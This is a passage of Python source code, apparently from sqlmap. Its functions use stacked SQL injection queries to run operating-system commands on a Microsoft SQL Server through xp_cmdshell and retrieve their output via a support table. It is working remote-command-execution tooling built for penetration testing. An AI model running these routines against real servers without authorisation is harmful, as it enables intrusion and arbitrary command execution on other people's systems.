(self, cmd, first=None, last=None)
| 189 | return inject.goStacked(self.xpCmdshellForgeCmd(cmd), silent) |
| 190 | |
| 191 | def xpCmdshellEvalCmd(self, cmd, first=None, last=None): |
| 192 | output = None |
| 193 | |
| 194 | if conf.direct: |
| 195 | output = self.xpCmdshellExecCmd(cmd) |
| 196 | |
| 197 | if output and isinstance(output, (list, tuple)): |
| 198 | new_output = "" |
| 199 | |
| 200 | for line in output: |
| 201 | if line == "NULL": |
| 202 | new_output += "\n" |
| 203 | else: |
| 204 | new_output += "%s\n" % line.strip("\r") |
| 205 | |
| 206 | output = new_output |
| 207 | else: |
| 208 | inject.goStacked(self.xpCmdshellForgeCmd(cmd, self.cmdTblName)) |
| 209 | |
| 210 | # When user provides DBMS credentials (with --dbms-cred), the |
| 211 | # command standard output is redirected to a temporary file |
| 212 | # The file needs to be copied to the support table, |
| 213 | # 'sqlmapoutput' |
| 214 | if conf.dbmsCred: |
| 215 | inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (self.cmdTblName, self.tmpFile, randomStr(10), randomStr(10))) |
| 216 | self.delRemoteFile(self.tmpFile) |
| 217 | |
| 218 | query = "SELECT %s FROM %s ORDER BY id" % (self.tblField, self.cmdTblName) |
| 219 | |
| 220 | if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: |
| 221 | output = inject.getValue(query, resumeValue=False, blind=False, time=False) |
| 222 | |
| 223 | if (output is None) or len(output) == 0 or output[0] is None: |
| 224 | output = [] |
| 225 | count = inject.getValue("SELECT COUNT(id) FROM %s" % self.cmdTblName, resumeValue=False, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) |
| 226 | |
| 227 | if isNumPosStrValue(count): |
| 228 | for index in getLimitRange(count): |
| 229 | query = agent.limitQuery(index, query, self.tblField) |
| 230 | output.append(inject.getValue(query, union=False, error=False, resumeValue=False)) |
| 231 | |
| 232 | inject.goStacked("DELETE FROM %s" % self.cmdTblName) |
| 233 | |
| 234 | if output and isListLike(output) and len(output) > 1: |
| 235 | _ = "" |
| 236 | lines = [line for line in flattenValue(output) if line is not None] |
| 237 | |
| 238 | for i in xrange(len(lines)): |
| 239 | line = lines[i] or "" |
| 240 | if line is None or i in (0, len(lines) - 1) and not line.strip(): |
| 241 | continue |
| 242 | _ += "%s\n" % line |
| 243 | |
| 244 | output = _.rstrip('\n') |
| 245 | |
| 246 | return output |
| 247 | |
| 248 | def xpCmdshellInit(self): |
no test coverage detected